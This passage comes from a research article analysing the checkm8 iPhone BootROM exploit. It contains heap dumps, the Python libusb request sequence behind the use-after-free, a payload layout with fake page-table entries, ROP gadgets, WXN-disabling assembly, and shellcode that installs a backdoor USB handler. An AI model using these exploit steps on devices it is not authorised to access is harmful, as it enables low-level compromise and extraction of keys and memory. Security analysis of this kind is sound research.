44 00 3A 00 0.1. .B.D.I.D.:. 00000050: 30 00 43 00 20 00 45 00 43 00 49 00 44 00 3A 00 0.C. .E.C.I.D.:. 00000060: 30 00 30 00 31 00 41 00 34 00 30 00 33 00 36 00 0.0.1.A.4.0.3.6. 00000070: 32 00 30 00 34 00 35 00 45 00 35 00 32 00 36 00 2.0.4.5.E.5.2.6. 00000080: 20 00 49 00 42 00 46 00 4C 00 3A 00 33 00 43 00 .I.B.F.L.:.3.C. 00000090: 20 00 53 00 52 00 54 00 47 00 3A 00 5B 00 69 00 .S.R.T.G.:.[.i. 000000A0: 42 00 6F 00 6F 00 74 00 2D 00 32 00 36 00 39 00 B.o.o.t.-.2.6.9. 000000B0: 36 00 2E 00 30 00 2E 00 30 00 2E 00 31 00 2E 00 6...0...0...1... chunk at 0x9a40 // zlps[0] 0x80 non-free 0x140 0 00000000: 80 00 00 00 00 00 00 00 00 89 08 80 01 00 00 00 ................ 00000010: FF FF FF FF 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00000020: 00 00 00 00 00 00 00 00 40 96 1B 80 01 00 00 00 ........@....... 00000030: F0 F1 F2 F3 F4 F5 F6 F7 F8 F9 FA FB FC FD FE FF ................ chunk at 0x9ac0 0x46540 free 0x80 0 00000000: 00 00 00 00 00 00 00 00 F8 8F 08 80 01 00 00 00 ................ 00000010: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00000020: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00000030: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00000040: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00000050: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00000060: 00 00 00 00 00 00 00 00 01 00 00 00 00 00 00 00 ................ 00000070: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00000080: 00 00 00 00 00 00 00 00 F8 8F 08 80 01 00 00 00 ................ 00000090: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 000000A0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 000000B0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................

You can also achieve an interesting effect by overflowing the configuration descriptors High Speed and Full Speed that are located right after the IO buffer. One of the fields of a configuration descriptor is responsible for its overall length. By overflowing this field, we can read beyond the descriptor. You can try and do it yourself by modifying the exploit.

2. Allocation and freeing of the IO buffer without clearing the global state

device = dfu.acquire_device() device.serial_number libusb1_async_ctrl_transfer(device, 0x21, 1, 0, 0, 'A' * 0x800, 0.0001) libusb1_no_error_ctrl_transfer(device, 0x21, 4, 0, 0, 0, 0) dfu.release_device(device)

At this stage, an incomplete OUT request for uploading the image is created. At the same time, a global state is initialized, and the address of the buffer in the heap is written to the io_buffer . Then, DFU is reset with a DFU_CLR_STATUS request, and a new iteration of DFU begins.

3. Overwriting usb_device_io_request in the heap with use-after-free

device = dfu.acquire_device() device.serial_number stall(device) leak(device) leak(device) libusb1_no_error_ctrl_transfer(device, 0, 9, 0, 0, t8010_overwrite, 50)

At this stage, a usb_device_io_request type object is allocated in the heap, and it is overflown with t8010_overwrite , whose content was defined at the first stage.

The values of t8010_nop_gadget and 0x1800B0800 should overflow the fields callback and next of the usb_device_io_request structure.

t8010_nop_gadget is shown below and conforms to its name, but besides function return, the previous LR register is restored, and because of that the call free is skipped after the callback function in usb_core_complete_endpoint_io . This is important, because we damage the heap's metadata due to overflow, which would affect the exploit in case of a freeing attempt.

bootrom:000000010000CC6C LDP X29, X30, [SP,#0x10+var_s0] // restore fp, lr bootrom:000000010000CC70 LDP X20, X19, [SP+0x10+var_10],#0x20 bootrom:000000010000CC74 RET

next points to INSECURE_MEMORY + 0x800 . Later, INSECURE_MEMORY will store the exploit's payload, and at the offset of 0x800 in the payload, there is a callback-chain , which we'll discuss later on.

4. Placing the payload

for i in range(0, len(payload), 0x800): libusb1_no_error_ctrl_transfer(device, 0x21, 1, 0, 0, payload[i:i+0x800], 50)

At this stage, every following packet is put into the memory area allocated for the image. The payload looks like this:

0x1800B0000: t8010_shellcode # initializing shell-code ... 0x1800B0180: t8010_handler # new usb request handler ... 0x1800B0400: 0x1000006a5 # fake translation table descriptor # corresponds to SecureROM (0x100000000 -> 0x100000000) # matches the value in the original translation table ... 0x1800B0600: 0x60000180000625 # fake translation table descriptor # corresponds to SecureRAM (0x180000000 -> 0x180000000) # matches the value in the original translation table 0x1800B0608: 0x1800006a5 # fake translation table descriptor # new value translates 0x182000000 into 0x180000000 # plus, in this descriptor,there are rights for code execution 0x1800B0610: disabe_wxn_arm64 # code for disabling WXN 0x1800B0800: usb_rop_callbacks # callback-chain

5. Execution of callback-chain

dfu.usb_reset(device) dfu.release_device(device)

After USB reset, the loop of canceling incomplete usb_device_io_request in the queue by going through a linked list is started. In the previous stages, we replaced the rest of the queue, which allows us to control the callback chain. To build this chain, we use this gadget:

bootrom:000000010000CC4C LDP X8, X10, [X0,#0x70] ; X0 - usb_device_io_request pointer; X8 = arg0, X10 = call address bootrom:000000010000CC50 LSL W2, W2, W9 bootrom:000000010000CC54 MOV X0, X8 ; arg0 bootrom:000000010000CC58 BLR X10 ; call bootrom:000000010000CC5C CMP W0, #0 bootrom:000000010000CC60 CSEL W0, W0, W19, LT bootrom:000000010000CC64 B loc_10000CC6C bootrom:000000010000CC68 ; --------------------------------------------------------------------------- bootrom:000000010000CC68 bootrom:000000010000CC68 loc_10000CC68 ; CODE XREF: sub_10000CC1C+18↑j bootrom:000000010000CC68 MOV W0, #0 bootrom:000000010000CC6C bootrom:000000010000CC6C loc_10000CC6C ; CODE XREF: sub_10000CC1C+48↑j bootrom:000000010000CC6C LDP X29, X30, [SP,#0x10+var_s0] bootrom:000000010000CC70 LDP X20, X19, [SP+0x10+var_10],#0x20 bootrom:000000010000CC74 RET

As you can see, at the offset of 0x70 from the pointer to the structure, the call's address and its first argument are loaded. With this gadget, we can easily make any f(x) type calls for arbitrary f and x .

The entire call chain can be easily emulated with Unicorn Engine . We did it with our modified version of the plugin uEmu.

The results of the entire chain for iPhone 7 can be found below.

5.1. dc_civac 0x1800B0600

000000010000046C: SYS #3, c7, c14, #1, X0 0000000100000470: RET

Clearing and invalidating the processor's cache at a virtual address. This will make the processor address our payload later.

5.2. dmb

0000000100000478: DMB SY 000000010000047C: RET

A memory barrier that guarantees the completion of all operations with the memory done before this instruction. Instructions in high-performance processors can be executed in an order different from the programmed one for the purpose of optimization.

5.3. enter_critical_section()

Then, interrupts are masked for the atomic execution of further operations.

5.4. write_ttbr0(0x1800B0000)

00000001000003E4: MSR #0, c2, c0, #0, X0; [>] TTBR0_EL1 (Translation Table Base Register 0 (EL1)) 00000001000003E8: ISB 00000001000003EC: RET

A new value of the table register TTBR0_EL1 is set in 0x1800B0000 . It is the address of INSECURE MEMORY where the exploit's payload is stored. As was mentioned before, the translation descriptors are located at certain offsets in the payload:

... 0x1800B0400: 0x1000006a5 0x100000000 -> 0x100000000 (rx) ... 0x1800B0600: 0x60000180000625 0x180000000 -> 0x180000000 (rw) 0x1800B0608: 0x1800006a5 0x182000000 -> 0x180000000 (rx) ...

5.5. tlbi

0000000100000434: DSB SY 0000000100000438: SYS #0, c8, c7, #0 000000010000043C: DSB SY 0000000100000440: ISB 0000000100000444: RET

The translation table is invalidated in order to translate addresses according to our new translation table.

5.6. 0x1820B0610 - disable_wxn_arm64

MOV X1, #0x180000000 ADD X2, X1, #0xA0000 ADD X1, X1, #0x625 STR X1, [X2,#0x600] DMB SY MOV X0, #0x100D MSR SCTLR_EL1, X0 DSB SY ISB RET

WXN (Write permission implies Execute-never) is disabled to allow us execute code in RW memory. The execution of the WXN disabling code is possible due to the modified translation table.

5.7. write_ttbr0(0x1800A0000)

00000001000003E4: MSR #0, c2, c0, #0, X0; [>] TTBR0_EL1 (Translation Table Base Register 0 (EL1)) 00000001000003E8: ISB 00000001000003EC: RET

The original value of the TTBR0_EL1 translation register is restored. It is necessary for the correct operation of BootROM during the translation of virtual addresses because the data in INSECURE_MEMORY will be overwritten.

5.8. tlbi

The translation table is reset again.

5.9. exit_critical_section()

Interrupt handling is back to normal.

5.10. 0x1800B0000

Control is transferred to the initializing shellcode .

Thus, the main task of callback-chain is to disable WXN and transfer control to the shellcode in RW memory.

6. Execution of shellcode

The shellcode is in src/checkm8_arm64.S and does the following:

6.1. Overwriting USB configuration descriptors

In the global memory, two pointers to configuration descriptors usb_core_hs_configuration_descriptor and usb_core_fs_configuration_descriptor located in the heap are stored. In the third stage, these descriptors were damaged. They are necessary for the correct interaction with a USB device, so the shellcode restores them.

6.2. Changing USBSerialNumber

A new string descriptor with a serial number is created with a substring " PWND:[checkm8]" added to it. This will help us understand if the exploit was successful.

6.3. Overwriting the pointer of the USB request handler

The original pointer to the handler of USB requests to the interface is overwritten by a pointer to a new handler, which will be placed in the memory at the next step.

6.4. Copying USB request handler into TRAMPOLINE memory area ( 0x1800AFC00 )

Upon receiving a USB request, the new handler checks the wValue of the request against 0xffff and if they're not equal, it transfers control back to the original handler. If they are equal, various commands can be executed in the new handlers, like memcpy , memset , and exec (calling an arbitrary address with an arbitrary set of arguments).

Thus, the analysis of the exploit is complete.

The implementation of the exploit at a lower level of working with USB

As a bonus and an example of the attack at lower levels, we published a Proof-of-Concept of the checkm8 implementation on Arduino with USB Host Shield . The PoC works only for iPhone 7 but can be easily ported to other devices. When an iPhone 7 in DFU mode is connected to USB Host Shield , all the steps described in this article will be executed, and the device will enter PWND:[checkm8] mode. Then, it can be connected to a PC via USB to work with it using ipwndfu (to dump memory, use crypto keys, etc.). This method is more stable than using asynchronous requests with a minimal timeout because we work directly with the USB controller. We used the USB_Host_Shield_2.0 library. It needs minor modifications; the patch file is also in the repository.

In place of a conclusion

Analyzing checkm8 was very interesting. We hope that this article will be useful for the community and will motivate new research in this area. The vulnerability will continue to influence the jailbreak community. A jailbreak based on checkm8 is already being developed — checkra1n, and since the vulnerability is unfixable, it will always work on vulnerable chips ( A5 to A11 ) regardless of the iOS version. Plus, there are many vulnerable devices, like iWatch , Apple TV , etc. We expect more interesting projects for Apple devices to come.

Besides jailbreak, this vulnerability will also influence the researchers of Apple devices. With checkm8 , you can already boot iOS devices in verbose mode, dump SecureROM , or use the GID key to decrypt firmware images. Although, the most interesting application for this exploit would be entering debug mode on vulnerable devices with a special JTAG/SWD cable. Before that, it could only be done with special prototypes that are extremely hard to get or with the help of special services. Thus, with checkm8 , Apple research becomes way easier and cheaper.

References